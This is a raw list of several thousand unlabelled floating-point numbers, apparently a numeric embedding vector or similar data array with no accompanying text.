-0.003704934613779187, -0.00503914151340723, -0.005523329135030508, -0.013255990110337734, 0.023269714787602425, -0.020945612341165543, -0.038362033665180206, -0.012854293920099735, -0.018105043098330498, 0.006638755090534687, 0.018693242222070694, 0.009188811294734478, 0.010472806170582771, -0.008550400845706463, -0.022595437243580818, -0.0024944646283984184, 0.03821856901049614, 0.0037587331607937813, -0.02051522396504879, 0.004336172249168158, 0.008844500407576561, 0.002654067240655422, 0.02602420561015606, -0.013435319066047668, 0.0203861054033041, 0.022509360685944557, 0.0006608269177377224, -0.02249501459300518, -0.003518432378768921, -0.0038591574411839247, -0.005372692830860615, -0.04269461706280708, 0.0042465077713131905, -0.021763352677226067, -0.04085829108953476, 0.014281751587986946, 0.01760292239487171, 0.022925402969121933, -0.011233160272240639, -0.0081415306776762, 0.0005971651407890022, 0.021634235978126526, -0.027143217623233795, -0.00003550151450326666, 0.01349270436912775, -0.03956712409853935, 0.008708209730684757, 0.011893090792000294, -0.013349241577088833, -0.04556388035416603, -0.025765972211956978, 0.00418194942176342, -0.01813373528420925, -0.02707148715853691, 0.0010051383869722486, 0.026741521432995796, 0.007388349622488022, -0.0021286336705088615, -0.033914677798748016, -0.030127251520752907, -0.018334584310650826, -0.0012768215965479612, 0.007646583020687103, -0.014511292800307274, -0.008478669449687004, -0.026268092915415764, 0.00299837882630527, -0.008069799281656742, -0.0018246712861582637, 0.00558071443811059, 0.017861155793070793, 0.0027222123462706804, -0.013119700364768505, 0.015393590554594994, -0.009647893719375134, 0.01197916828095913, -0.03408683091402054, -0.00856474693864584, 0.014224366284906864, 0.030586332082748413, -0.014834084548056126, 0.03081587329506874, -0.0370708629488945, 0.00972679816186428, -0.0006137530435808003, -0.023456215858459473, 0.0018955061677843332, 0.021318616345524788, 0.0004532537132035941, -0.011376623995602131, -0.009848741814494133, -0.01932447962462902, -0.020285682752728462, 0.007144462317228317, -0.019912678748369217, -0.018879743292927742, 0.0018775733187794685, 0.017904194071888924, -0.009317927993834019, -0.046022962778806686, -0.022222433239221573, 0.014633236452937126, 0.026913676410913467, -0.04235030710697174, 0.012861466966569424, 0.03796033561229706, 0.027788802981376648, -0.020859533920884132, 0.001041900715790689, 0.0006612752331420779, -0.021160807460546494, -0.01606786623597145, 0.031102798879146576, -0.022911056876182556, -0.0013969718711450696, -0.01446108054369688, -0.015522707253694534, -0.017846809700131416, -0.010594749823212624, -0.01747380569577217, -0.010121321305632591, 0.022078970447182655, 0.0006715866038575768, -0.00451191421598196, 0.024933885782957077, 0.01953967474400997, -0.022925402969121933, -0.012983410619199276, 0.0006836913526058197, -0.04068613424897194, -0.0010401074541732669, 0.02509169653058052, -0.0056309266947209835, 0.010587576776742935, -0.02843438647687435, 0.01664171926677227, 0.0038232915103435516, -0.017947234213352203, -0.017990272492170334, -0.023570986464619637, -0.017100801691412926, -0.006312376353889704, 0.016828222200274467, 0.00972679816186428, -0.020615646615624428, -0.04352670535445213, -0.006111527793109417, 0.006387694273144007, -0.029467320069670677, 0.006448666099458933, 0.02892216108739376, -0.0083423787727952, 0.017445113509893417, -0.007754180580377579, 0.011398143135011196, -0.02025698870420456, -0.013801150023937225, -0.015422282740473747, -0.04499002918601036, -0.030500255525112152, -0.017990272492170334, 0.02570858784019947, 0.01540793664753437, 0.013657687231898308, 0.02456088177859783, 0.0033175840508192778, 0.031762730330228806, 0.007660929579287767, 0.012997756712138653, -0.032508738338947296, -0.016699105501174927, -0.013184258714318275, 0.023743143305182457, -0.04745759442448616, 0.00682525709271431, 0.013679206371307373, -0.013585955835878849, 0.022294165566563606, -0.014733660034835339, 0.027229296043515205, -0.031074106693267822, 0.007531812880188227, -0.007338137365877628, 0.016211330890655518, 0.016182636842131615, 0.023312753066420555, -0.007040451746433973, 0.009898954071104527, 0.008335205726325512, -0.008772768080234528, -0.005508983042091131, -0.0065383305773139, 0.015910057350993156, -0.021820737048983574, -0.008399764075875282, -0.005537675693631172, 0.01179984025657177, -0.028850428760051727, -0.025722933933138847, 0.04886353015899658, 0.01923840120434761, 0.002252370584756136, -0.011405316181480885, -0.0042178151197731495, -0.0024388725869357586, -0.007897643372416496, -0.01142683532088995, 0.028778698295354843, 0.010200226679444313, -0.03907934948801994, 0.015135357156395912, -0.017574230208992958, 0.02413049340248108, -0.01439652219414711, -0.008715382777154446, -0.01268213801085949, -0.014575851149857044, -0.011211641132831573, 0.010322170332074165, -0.017416419461369514, -0.0014776699244976044, -0.01547966804355383, 0.007481600623577833, -0.006556263659149408, -0.0046733105555176735, 0.007112183142453432, 0.03443114459514618, -0.0026038552168756723, 0.009777010418474674, 0.0006738282390870154, -0.0057062446139752865, 0.00002481183037161827, -0.009404006414115429, -0.025421660393476486, 0.012603233568370342, -0.03534930571913719, 0.013134046457707882, -0.004508327692747116, -0.013055142015218735, -0.006427146960049868, -0.02725798822939396, 0.010623442009091377, -0.014482599683105946, 0.0035022927913814783, -0.04496133327484131, 0.008155876770615578, -0.00400620698928833, -0.02139034867286682, 0.008536054752767086, -0.00877994205802679, -0.02051522396504879, -0.02460392192006111, 0.000013624790881294757, -0.003970341291278601, -0.004877745173871517, -0.0020443492103368044, -0.009411179460585117, 0.09680889546871185, 0.012201536446809769, -0.0030934230890125036, -0.010802770964801311, -0.010996446944773197, -0.01144835539162159, 0.02170596644282341, 0.02206462435424328, 0.01179984025657177, -0.020716071128845215, 0.011807013303041458, -0.024417418986558914, 0.008457149378955364, 0.011319238692522049, -0.0018972994294017553, 0.01655564084649086, 0.0011082524433732033, -0.0032028136774897575, -0.005774389486759901, 0.020357413217425346, -0.012918852269649506, 0.02095995843410492, -0.006527571007609367, 0.010099802166223526, -0.01164920348674059, 0.0006603786023333669, -0.0020443492103368044, -0.010429766960442066, 0.009174465201795101, -0.0034897399600595236, -0.004020553547888994, 0.007115769665688276, -0.01994137093424797, -0.02540731430053711, 0.01704341545701027, 0.004454529378563166, 0.003505879547446966, -0.009482910856604576, 0.011261853389441967, -0.021605541929602623, -0.011254680342972279, -0.00004138574149692431, -0.014145461842417717, 0.02060130052268505, -0.0021824324503540993, -0.017574230208992958, 0.029610782861709595, 0.007302271667867899, 0.002594888675957918, -0.011498567648231983, -0.02768837846815586, -0.004823946859687567, -0.004027726594358683, 0.013291856274008751, -0.020371759310364723, 0.01985529251396656, -0.022165048867464066, 0.007187501061707735, -0.011053831316530704, -0.004910024348646402, 0.01466192863881588, 0.012036553584039211, -0.02588074281811714, -0.0013467598473653197, -0.006244231481105089, 0.01047997921705246, -0.010314996354281902, -0.0179185401648283, -0.006620822008699179, 0.01629740744829178, 0.040743518620729446, 0.0020766283851116896, -0.003383935894817114, 0.004576473031193018, 0.016699105501174927, 0.0010284511372447014, -0.00743138836696744, 0.015106664039194584, 0.009303581900894642, -0.027157563716173172, 0.021074729040265083, 0.006211952306330204, 0.005304547958076, 0.010508672334253788, -0.010809944011271, 0.00620836578309536, -0.021519465371966362, -0.0191523227840662, 0.03747256100177765, 0.029295165091753006, 0.0116420304402709, 0.007847431115806103, 0.018420662730932236, 0.012423904612660408, 0.006767871789634228, 0.0023671411909163, 0.0005312617868185043, -0.011699415743350983, -0.01689995266497135, -0.011484220623970032, 0.0075748516246676445, -0.0025877156294882298, 0.00902382843196392, -0.003751560114324093, -0.019037554040551186, 0.00856474693864584, 0.021246884018182755, 0.0259381290525198, -0.03463199362158775, 0.014704967848956585, -0.008284993469715118, -0.01303362287580967, -0.007008172571659088, -0.014748006127774715, 0.013464012183248997, -0.031762730330228806, 0.03701347857713699, 0.0018130148528143764, 0.013829843141138554, -0.030442869290709496, -0.03342690318822861, -0.012818427756428719, 0.0022989960853010416, 0.0025231572799384594, 0.03520584478974342, -0.00041245640022680163, -0.006818083580583334, 0.002227264689281583, -0.004149670246988535, 0.014647582545876503, 0.001691967947408557, 0.016168290749192238, 0.013420972973108292, 0.022222433239221573, 0.008112838491797447, 0.002759871305897832, -0.006140220444649458, 0.019137976691126823, -0.0008935061050578952, 0.005749283824115992, -0.012466942891478539, 0.03236527368426323, -0.00695437379181385, 0.006219125352799892, 0.02153381146490574, -0.007983721792697906, -0.01443956047296524, -0.006821670103818178, 0.00733096431940794, -0.002483704825863242, -0.01712949387729168, -0.020199604332447052, 0.003663688898086548, -0.017846809700131416, 0.011555952951312065, 0.003500499529764056, 0.03351297974586487, 0.02153381146490574, 0.003166947979480028, 0.0035955437924712896, 0.038505494594573975, 0.018478047102689743, 0.0375012531876564, 0.0015458149136975408, 0.009009482339024544, 0.010759732685983181, -0.019094938412308693, -0.04751497879624367, -0.009698105044662952, -0.003107769414782524, 0.007316618226468563, 0.005713417660444975, -0.02398703061044216, -0.0010634202044457197, -0.003244059393182397, 0.009389659389853477, -0.005458770785480738, 0.03270958736538887, 0.03560754284262657, 0.003582990961149335, 0.007854605093598366, -0.005272268783301115, 0.026612404733896255, 0.01138379704207182, 0.018062004819512367, -0.0011952269123867154, -0.0005644376506097615, 0.014253058470785618, -0.03319736197590828, 0.005053487606346607, 0.0003976617881562561, 0.009834395721554756, -0.00939683336764574, -0.019970063120126724, -0.010071109049022198, -0.004002620466053486, -0.023829219862818718, -0.00468765664845705, 0.006570609752088785, -0.006832430139183998, 0.0009051624801941216, -0.021433386951684952, 0.006046969443559647, -0.02372879721224308, -0.003934475593268871, -0.05032685399055481, 0.01844935491681099, -0.0031203224789351225, 0.008414111100137234, -0.02025698870420456, 0.0070906635373830795, -0.0273871049284935, 0.01375811081379652, -0.0068109105341136456, 0.015379244461655617, -0.009325101040303707, -0.010594749823212624, -0.02064434066414833, -0.033484287559986115, -0.015106664039194584, 0.010881676338613033, 0.02364271879196167, 0.015666170045733452, 0.009224677458405495, 0.020888227969408035, -0.007488773670047522, 0.01817677542567253, -0.007503120228648186, 0.013672033324837685, -0.014834084548056126, 0.020759109407663345, -0.018420662730932236, -0.0011952269123867154, 0.013585955835878849, -0.02068737894296646, -0.02545035444200039, 0.0042465077713131905, 0.0007388349622488022, -0.0053224810399115086, 0.007940682582557201, -0.00017047450819518417, 0.0013781423913314939, -0.006850362755358219, -0.026138976216316223, -0.016225676983594894, -0.00017652685346547514, 0.006125874351710081, -0.0139087475836277, -0.017861155793070793, 0.008650824427604675, -0.0027849774342030287, 0.015221434645354748, 0.009698105044662952, -0.0018721934175118804, -0.010049589909613132, 0.01827719807624817, 0.007911989465355873, 0.012015034444630146, 0.008241955190896988, -0.0009809288894757628, 0.007861778140068054, -0.00910990685224533, -0.0056022340431809425, 0.010580403730273247, 0.013126873411238194, 0.01499189343303442, -0.0175168439745903, 0.003414421807974577, -0.004357691388577223, -0.0007859087781980634, 0.014080903492867947, 0.006983066443353891, 0.03675524517893791, -0.007287925574928522, -0.022552398964762688, 0.0199844092130661, 0.005078593734651804, -0.007345310412347317, -0.02545035444200039, -0.009253369644284248, 0.015594438649713993, 0.034316372126340866, -0.0026988994795829058, -0.045850805938243866, 0.02443176507949829, -0.014367829076945782, -0.018764972686767578, 0.0032512324396520853, 0.00986308790743351, 0.0017538364045321941, -0.010429766960442066, -0.0036493425723165274, -0.005623753648251295, -0.009891781024634838, -0.025651201605796814, 0.01177832018584013, 0.02725798822939396, 0.025019964203238487, -0.00006797684909543023, -0.0039057829417288303, 0.0012266094563528895, 0.007804392371326685, 0.03738648444414139, -0.009138599038124084, -0.02461826801300049, -0.015623131766915321, -0.015063625760376453, -0.024245264008641243, -0.0020730418618768454, -0.006732006091624498, 0.0037336270324885845, -0.011749627999961376, -0.018951475620269775, 0.012753869406878948, -0.028506116941571236, -0.004318239167332649, 0.01955402083694935, 0.020314374938607216, -0.015221434645354748, 0.005871227476745844, 0.017689000815153122, -0.004945890512317419, -0.007287925574928522, 0.003102389397099614, -0.002089181449264288, 0.006183259654790163, 0.0007406282238662243, -0.017947234213352203, 0.004153256770223379, 0.008206089027225971, -0.011154255829751492, -0.009145772084593773, -0.011936130002140999, -0.019338825717568398, -0.0075174663215875626, -0.024862155318260193, 0.0007877020980231464, 0.006050555966794491, -0.027315374463796616, 0.000718660478014499, -0.009411179460585117, 0.021433386951684952, 0.003916542511433363, 0.0024765317793935537, -0.023183636367321014, 0.0038017721381038427, 0.04659681394696236, 0.0077972193248569965, -0.013263163156807423, 0.01103231217712164, -0.018592817708849907, 0.013026448898017406, 0.021246884018182755, 0.00003384832598385401, -0.0022774767130613327, 0.010759732685983181, 0.007969374768435955, 0.018033310770988464, -0.0018937129061669111, -0.024187877774238586, -0.013083834201097488, 0.014288924634456635, 0.0067212460562586784, 0.0026253745891153812, -0.005179017782211304, -0.009784183464944363, 0.01778942346572876, -0.008098491467535496, 0.03517715260386467, 0.03824726119637489, 0.00856474693864584, -0.00031315305386669934, -0.002598475432023406, 0.0014633235987275839, -0.007026105187833309, 0.01708645559847355, 0.02887912094593048, 0.017014723271131516, -0.005254336167126894, -0.002456805668771267, -0.021763352677226067, 0.010666481219232082, -0.0069436137564480305, 0.005344000644981861, -0.02319798246026039, -0.012452596798539162, -0.007122942712157965, -0.006552677135914564, 0.019525326788425446, 0.007029691711068153, -0.016541294753551483, 0.0025751625653356314, -0.0041138045489788055, 0.022738901898264885, -0.022882364690303802, 0.038935884833335876, 0.011634857393801212, -0.01054453756660223, -0.02266716957092285, 0.0012068833457306027, -0.009353794157505035, 0.0030808700248599052, -0.0004716349358204752, 0.009956339374184608, 0.0027257988695055246, 0.0036027170717716217, 0.007668102625757456, -0.022035932168364525, 0.017272956669330597, -0.027401451021432877, 0.01294754445552826, -0.005010448861867189, -0.004727108869701624, -0.02372879721224308, -0.018721934407949448, 0.024202223867177963, -0.011168601922690868, 0.058619022369384766, -0.005767216440290213, 0.010121321305632591, -0.01638348586857319, 0.0006957960431464016, -0.002939200261607766, -0.0001649825571803376, -0.008715382777154446, -0.0024980511516332626, -0.006294443272054195, -0.003236886113882065, -0.016971684992313385, -0.002282856497913599, 0.008464322425425053, 0.025019964203238487, 0.028563503175973892, 0.02496257983148098, 0.020845187827944756, -0.007402695715427399, 0.01902320608496666, -0.0066064754500985146, -0.02998378686606884, 0.007976547814905643, 0.00829934049397707, -0.011218814179301262, -0.0067642852663993835, 0.023355793207883835, -0.015293166041374207, -0.026124630123376846, 0.015221434645354748, 0.022308511659502983, -0.018764972686767578, -0.022824978455901146, 0.0370708629488945, 0.01157747209072113, -0.002906921086832881, 0.005917852744460106, 0.001634582644328475, 0.00660288892686367, 0.012839946895837784, 0.015221434645354748, 0.007158808410167694, 0.006631581578403711, -0.004235748201608658, -0.01336358767002821, 0.0028854014817625284, -0.007538985926657915, 0.00219139875844121, 0.015924403443932533, 0.013047968968749046, -0.012854293920099735, -0.0008903678390197456, 0.004490395076572895, 0.011111216619610786, -0.008320859633386135, 0.019424904137849808, 0.010372381657361984, 0.02064434066414833, 0.0006263061077333987, -0.016699105501174927, -0.00891623180359602, -0.011419662274420261, -0.005412145517766476, 0.008284993469715118, 0.012804081663489342, -0.006678207311779261, 0.018334584310650826, -0.006932854186743498, 0.054745517671108246, -0.0014059384120628238, 0.004210642073303461, 0.018305892124772072, -0.0002936510427389294, -0.0030324512626975775, 0.015737902373075485, -0.014704967848956585, 0.006158153526484966, -0.0003198778722435236, 0.0017897021025419235, 0.012768215499818325, 0.008091318421065807, 0.017975926399230957, -0.010644962079823017, -0.011570299044251442, -0.003267372027039528, 0.005519742611795664, -0.002363554434850812, 0.007890470325946808, -0.008622132241725922, -0.004752214998006821, 0.024187877774238586, 0.005419318564236164, -0.01499189343303442, 0.0006680000806227326, 0.018478047102689743, -0.003855570685118437, 0.007646583020687103, -0.021017344668507576, 0.010042416863143444, -0.015694862231612206, -0.0037659064400941133, 0.022566745057702065, 0.013851362280547619, -0.0024675652384757996, 0.0009387866593897343, -0.005795909091830254, -0.018291544169187546, -0.014073729515075684, 0.01512101013213396, 0.003912955988198519, 0.015881365165114403, -0.0020855946931988, -0.009160119108855724, -0.0036278232000768185, 0.01258888654410839, -0.00677863135933876, -0.04596557840704918, -0.007711141370236874, -0.0035112593322992325, -0.0012006068136543036, -0.0006460322765633464, -0.000130349668324925, 0.012136978097259998, -0.005792322568595409, -0.008284993469715118, 0.0011629477376118302, 0.013657687231898308, 0.0029947920702397823, 0.02134730853140354, 0.02447480522096157, 0.0012615786399692297, -0.023255368694663048, 0.0025159840006381273, -0.014920162037014961, -0.02157684974372387, 0.0027544915210455656, -0.008952097035944462, -0.01783246360719204, -0.00024971546372398734, -0.012036553584039211, -0.0018470874056220055, -0.02385791391134262, -0.004242921248078346, -0.007962201721966267, -0.0027437317185103893, 0.02117515355348587, -0.005810255650430918, 0.002403006888926029, 0.015594438649713993, -0.0017305236542597413, 0.0015449182828888297, 0.019353171810507774, -0.01821981370449066, 0.0025446766521781683, 0.011598991230130196, -0.008636478334665298, -0.003468220354989171, 0.010350862517952919, 0.0038986096624284983, 0.022868018597364426, -0.009985031560063362, 0.010020897723734379, 0.008736902847886086, -0.0035901640076190233, 0.003504086285829544, -0.0019672377966344357, -0.019912678748369217, 0.00006142014171928167, 0.007538985926657915, 0.02108907513320446, -0.005243576131761074, -0.02580901049077511, 0.028391346335411072, 0.0050714206881821156, 0.021031690761446953, -0.017990272492170334, 0.017115147784352303, -0.0037192809395492077, -0.03394336998462677, -0.005042728036642075, -0.020572608336806297, 0.02606724575161934, -0.010358035564422607, -0.0016973477322608232, 0.010250438004732132, -0.005171844735741615, 0.016455218195915222, -0.012617579661309719, -0.008493015542626381, 0.036296162754297256, 0.003330137114971876, -0.02351360209286213, -0.010587576776742935, -0.0033319303765892982, -0.004906437825411558, 0.004192708991467953, -0.014231539331376553, 0.017588576301932335, -0.024187877774238586, -0.011871571652591228, -0.00408152537420392, -0.006046969443559647, -0.008837326429784298, -0.009540296159684658, 0.003991860896348953, -0.004705589730292559, 0.0015440216520801187, 0.015235780738294125, 0.02068737894296646, -0.0007854604627937078, -0.0037730794865638018, 0.015924403443932533, 0.015192742459475994, 0.014353482984006405, 0.003409041790291667, 0.0028154633473604918, -0.0011737074237316847, -0.0054838769137859344, 0.02998378686606884, -0.013220124877989292, -0.014123941771686077, -0.016569986939430237, 0.00959768146276474, 0.003855570685118437, -0.018391968682408333, 0.009145772084593773, -0.023499255999922752, -0.004375624470412731, 0.010996446944773197, 0.009145772084593773, 0.002333068521693349, -0.003751560114324093, 0.025436006486415863, 0.023083211854100227, 0.02381487376987934, 0.0002781839284580201, 0.025249505415558815, 0.007438561879098415, -0.01883670501410961, -0.02342752367258072, -0.022824978455901146, -0.01083146408200264, -0.011957649141550064, -0.0027724243700504303, 0.005824601743370295, -0.004580059554427862, 0.034976303577423096, 0.02153381146490574, 0.024187877774238586, 0.035148460417985916, 0.01685691438615322, -0.004870572127401829, 0.03227919712662697, 0.008729729801416397, 0.011735281907022, -0.011563125997781754, -0.00017338860197924078, -0.009647893719375134, -0.02139034867286682, 0.018592817708849907, 0.0018757800571620464, -0.015967443585395813, -0.008378244936466217, 0.012108285911381245, 0.0007226953748613596, 0.006021863780915737, 0.017057761549949646, 0.011728107929229736, -0.01261040661484003, 0.007051211316138506, -0.004540606867522001, 0.0013082041405141354, 0.0005039141396991909, -0.008055453188717365, -0.015336205251514912, -0.008313686586916447, -0.0024460458662360907, 0.014611716382205486, -0.017904194071888924, -0.004795254208147526, 0.008184569887816906, 0.021404694765806198, -0.0129690645262599, 0.01349270436912775, -0.00040483492193743587, -0.000037715104554081336, -0.004651790950447321, -0.0020443492103368044, -0.006186846178025007, 0.010601922869682312, -0.0015278819482773542, -0.014425214380025864, 0.004397144075483084, 0.004666137043386698, 0.014324790798127651, -0.011419662274420261, 0.003039624309167266, -0.006513224449008703, -0.008686690591275692, -0.03104541450738907, 0.003190260613337159, 0.020099179819226265, 0.005494636483490467, 0.01329902932047844, 0.008923404850065708, 0.004343345295637846, 0.009188811294734478, -0.02074476331472397, -0.01681387424468994, -0.004927957430481911, -0.0009262336534447968, -0.0015431249048560858, 0.009604854509234428, 0.037185635417699814, 0.023355793207883835, 0.015235780738294125, -0.005412145517766476, -0.00002402726750005968, 0.001999516971409321, -0.020500876009464264, -0.004156843293458223, -0.01219436340034008, 0.01450411882251501, 0.012976237572729588, 0.021318616345524788, -0.007065557409077883, -0.008442803286015987, -0.012108285911381245, 0.006226298399269581, 0.0005671275430358946, -0.01369355246424675, 0.0012795114889740944, 0.02117515355348587, -0.027229296043515205, 0.001298341085202992, -0.0024460458662360907, 0.041145216673612595, -0.012172844260931015, -0.0008388108108192682, -0.00778287323191762, 0.01459737028926611, 0.00558071443811059, -0.018635855987668037, 0.00585688091814518, -0.0035686446353793144, -0.003606303595006466, 0.007818738929927349, 0.008593439124524593, -0.011914609931409359, 0.004820359870791435, -0.017272956669330597, -0.0052328165620565414, -0.006592129357159138, 0.0002819946384988725, -0.0061330473981797695, 0.019496634602546692, 0.005903506651520729, 0.013686379417777061, -0.010759732685983181, 0.00972679816186428, -0.012086765840649605, 0.008593439124524593, -0.003179500810801983, 0.016440870240330696, -0.001863226993009448, 0.005638099741190672, 0.003019898198544979, 0.022208087146282196, -0.009131425991654396, -0.030270714312791824, 0.011003619991242886, -0.000536193314474076, -0.0003705382696352899, -0.016584334895014763, -0.003970341291278601, -0.022351549938321114, 0.016455218195915222, -0.008822980336844921, -0.014704967848956585, -0.015580092556774616, -0.0027795974165201187, 0.012409557588398457, -0.013535743579268456, -0.01076690573245287, -0.03411552309989929, -0.027788802981376648, 0.012768215499818325, 0.01320577785372734, 0.017057761549949646, 0.005595060996711254, 0.019525326788425446, 0.017574230208992958, -0.00999220460653305, 0.0070440382696688175, -0.01753119006752968, -0.024905193597078323, 0.004350518342107534, -0.024675652384757996, 0.0010589370504021645, -0.0068969884887337685, 0.00019479598267935216, 0.027932265773415565, -0.015450975857675076, 0.014080903492867947, -0.03334082290530205, 0.009891781024634838, 0.0062657506205141544, -0.014640409499406815, -0.005354760214686394, -0.00020376243628561497, -0.025694241747260094, 0.019525326788425446, -0.013399453833699226, -0.016096560284495354, 0.009561815299093723, -0.016699105501174927, -0.011412489227950573, -0.0048669856041669846, -0.010028070770204067, -0.0009262336534447968, -0.013212950900197029, -0.01704341545701027, 0.007811565883457661, -0.015049278736114502, -0.007026105187833309, 0.03322605416178703, 0.011405316181480885, 0.005035554524511099, 0.007911989465355873, -0.009590508416295052, 0.008098491467535496, 0.005186190828680992, -0.012531501241028309, 0.007140875793993473, 0.010515845380723476, -0.004745041951537132, 0.013105354271829128, 0.006656687706708908, -0.012553021311759949, 0.01241673156619072, -0.01624002307653427, -0.006861122790724039, -0.0039667547680437565, 0.03302520513534546, 0.006950787268579006, 0.0346032977104187, -0.00444735586643219, 0.004985342733561993, -0.005057074129581451, -0.011204468086361885, -0.006233471445739269, -0.005634513217955828, 0.01606786623597145, 0.004676897078752518, 0.00531530799344182, -0.002227264689281583, -0.02139034867286682, 0.010594749823212624, -0.0006478255381807685, 0.015092317946255207, -0.013657687231898308, -0.013148392550647259, 0.004314652644097805, 0.02641155570745468, 0.021433386951684952, -0.016785182058811188, 0.007847431115806103, -0.006742765661329031, -0.01932447962462902, 0.01655564084649086, 0.0043648649007081985, -0.009777010418474674, -0.012624752707779408, -0.00209097471088171, 0.018879743292927742, -0.013155566528439522, 0.02532123774290085, 0.004275200422853231, -0.014088076539337635, 0.020443491637706757, -0.0005841638194397092, -0.020314374938607216, 0.015910057350993156, 0.01192895695567131, -0.012230229564011097, -0.0007285235333256423, 0.017459459602832794, -0.0016193396877497435, 0.022839324548840523, -0.022423282265663147, 0.0083423787727952, -0.020615646615624428, -0.006846776232123375, -0.0072664059698581696, 0.0036708619445562363, 0.014260231517255306, 0.013377933762967587, 0.024101801216602325, 0.029926402494311333, -0.005641686264425516, -0.009031002409756184, -0.010845810174942017, -0.0005438147927634418, 0.0010338309220969677, -0.009454217739403248, 0.00036919332342222333, -0.005293788388371468, -0.006240644957870245, -0.0032243330497294664, 0.00040147252730093896, 0.00394164863973856, -0.010881676338613033, 0.00807697232812643, -0.00018403625290375203, -0.005953718442469835, -0.0036834150087088346, 0.01136227697134018, -0.010996446944773197, -0.006642341613769531, -0.009274889715015888, -0.007768526673316956, -0.036525703966617584, -0.011211641132831573, -0.0029445800464600325, 0.003744386835023761, 0.011046658270061016, -0.01659868098795414, -0.014977547340095043, 0.00506424717605114, 0.01258888654410839, 0.0033426901791244745, -0.0075461589731276035, 0.0007271785871125758, 0.011491394601762295, 0.00024186981318052858, -0.02192116156220436, -0.018062004819512367, -0.02636851742863655, 0.016397831961512566, -0.01953967474400997, -0.009626373648643494, 0.010573230683803558, -0.029955094680190086, -0.010723866522312164, -0.009525950066745281, 0.008937750943005085, 0.010164360515773296, 0.0011584644671529531, 0.010228918865323067, -0.022265473380684853, 0.01685691438615322, 0.006914921570569277, 0.00749594671651721, -0.023929644376039505, -0.01642652414739132, -0.0029266471974551678, -0.029869016259908676, -0.006122287828475237, 0.00648453226312995, -0.018248505890369415, 0.005670378915965557, -0.02400137670338154, 0.0017592161893844604, -0.0029266471974551678, -0.0012597853783518076, -0.016397831961512566, -0.0026020619552582502, 0.007689622230827808, 0.012538675218820572, -0.005609407089650631, 0.009009482339024544, 0.006900575011968613, 0.0013180671958252788, -0.00979852955788374, -0.01672779768705368, -0.0028907814994454384, 0.018205467611551285, 0.018965821713209152, 0.03445983678102493, 0.01192895695567131, 0.026784559711813927, 0.012488462962210178, -0.0033713828306645155, 0.0018183947540819645, -0.008708209730684757, -0.00801241397857666, 0.00840693712234497, 0.01549401506781578, 0.003747973358258605, 0.006520397961139679, 0.006671034265309572, 0.005860467441380024, -0.0028943680226802826, -0.020543916150927544, 0.018248505890369415, 0.009475737810134888, 0.006463012658059597, -0.005329654086381197, 0.009812875650823116, -0.012639098800718784, -0.006853949744254351, 0.028204845264554024, -0.013793976977467537, 0.002571576042100787, 0.012230229564011097, 0.010135668329894543, -0.008701036684215069, -0.01923840120434761, -0.015020586550235748, 0.0075461589731276035, -0.0036834150087088346, -0.006014690268784761, 0.027243642136454582, -0.002370727714151144, -0.0064414930529892445, 0.007108596619218588, -0.0019062659703195095, 0.018879743292927742, 0.010142841376364231, 0.011878744699060917, 0.00904534850269556, 0.005293788388371468, -0.0081415306776762, -0.0027275921311229467, 0.020586954429745674, -0.004257267341017723, 0.012180017307400703, 0.02149077132344246, -0.000035669632779899985, 0.007976547814905643, 0.027774455025792122, 0.005935785826295614, 0.018463701009750366, -0.0017152806976810098, 0.007933509536087513, -0.0031633612234145403, 0.017115147784352303, -0.009346621111035347, 0.008528880774974823, -0.013607474975287914, 0.007488773670047522, -0.018865397199988365, 0.012022207491099834, -0.005225643515586853, -0.013607474975287914, -0.0000012153734587627696, -0.00788329727947712, 0.0044114901684224606, 0.002060488797724247, -0.027903571724891663, 0.0014857397181913257, 0.008421284146606922, -0.0032601989805698395, 0.022294165566563606, -0.012531501241028309, -0.005641686264425516, 0.0014032484032213688, 0.002989412285387516, 0.0028244296554476023, 0.0028620888479053974, -0.007790046278387308, 0.017760731279850006, -0.020572608336806297, 0.0022667169105261564, 0.003487946465611458, 0.0009970684768632054, 0.013334894552826881, 0.020586954429745674, 0.021246884018182755, -0.0177033469080925, -0.0026899331714957952, 0.011720934882760048, 0.0066459281370043755, -0.004095871467143297, -0.0035435385070741177, -0.002259543864056468, -0.016010481864213943, -0.012380865402519703, -0.016311753541231155, 0.012574540451169014, 0.021203845739364624, 0.0009683759417384863, -0.0018811598420143127, -0.018148081377148628, -0.003496913006529212, 0.00559147447347641, -0.018033310770988464, 0.02210766263306141, 0.0022972028236836195, -0.006678207311779261, 0.016096560284495354, -0.002162706106901169, -0.003577610943466425, 0.009568988345563412, 0.006541917100548744, 0.010860156267881393, 0.010071109049022198, 0.0025177772622555494, 0.004253680817782879, -0.017315996810793877, 0.007388349622488022, -0.0014973960351198912, -0.023212328553199768, -0.004483222030103207, 0.016096560284495354, 0.011319238692522049, -0.005803082138299942, -0.0071480488404631615, 0.0027257988695055246, 0.0025554364547133446, -0.005968065001070499, 0.013313375413417816, -0.011785493232309818, -0.0042644403874874115, -0.009547469206154346, -0.010860156267881393, 0.013270336203277111, -0.00479884073138237, -0.002819049870595336, 0.0066459281370043755, -0.009841568768024445, -0.017244264483451843, 0.020443491637706757, -0.0006635168101638556, 0.009131425991654396, -0.014066556468605995, -0.008650824427604675, 0.015623131766915321, -0.0058532943949103355, 0.010035243816673756, -0.017029069364070892, 0.017947234213352203, 0.01840631477534771, -0.006886228919029236, -0.004092284943908453, 0.025464700534939766, -0.019826600328087807, 0.002221884671598673, 0.004325412213802338, -0.008808634243905544, 0.019840946421027184, 0.009999377653002739, 0.023212328553199768, 0.01404503732919693, -0.004680483601987362, -0.02668413706123829, 0.0039093694649636745, -0.006118701305240393, -0.015823978930711746, 0.005598647519946098, 0.00001964211514859926, -0.024890847504138947, -0.000015172903658822179, -0.011541605927050114, 0.021117767319083214, 0.005892746616154909, 0.011857224628329277, -0.0007738040876574814, 0.01067365426570177, -0.007732660975307226, -0.021146461367607117, 0.001409524935297668, -0.007287925574928522, -0.00204076268710196, -0.010989272966980934, 0.018018964678049088, -0.004727108869701624, -0.00344490772113204, -0.013442492112517357, -0.0011315651936456561, 0.015336205251514912, 0.010171533562242985, 0.00593219930306077, -0.029079969972372055, 0.023915298283100128, 0.010867329314351082, 0.03856287896633148, 0.009038175456225872, -0.009325101040303707, 0.0015718175563961267, -0.015350551344454288, -0.029696861281991005, 0.026928024366497993, 0.0005496430094353855, -0.015795286744832993, -0.011304892599582672, 0.011089697480201721, -0.029639476910233498, -0.008471496403217316, -0.016928644850850105, 0.002169879386201501, 0.0010329342912882566, -0.04028443619608879, 0.004307479597628117, -0.006502464879304171, -0.008328032679855824, 0.012086765840649605, -0.006491705309599638, 0.0011225987691432238, 0.013471185229718685, 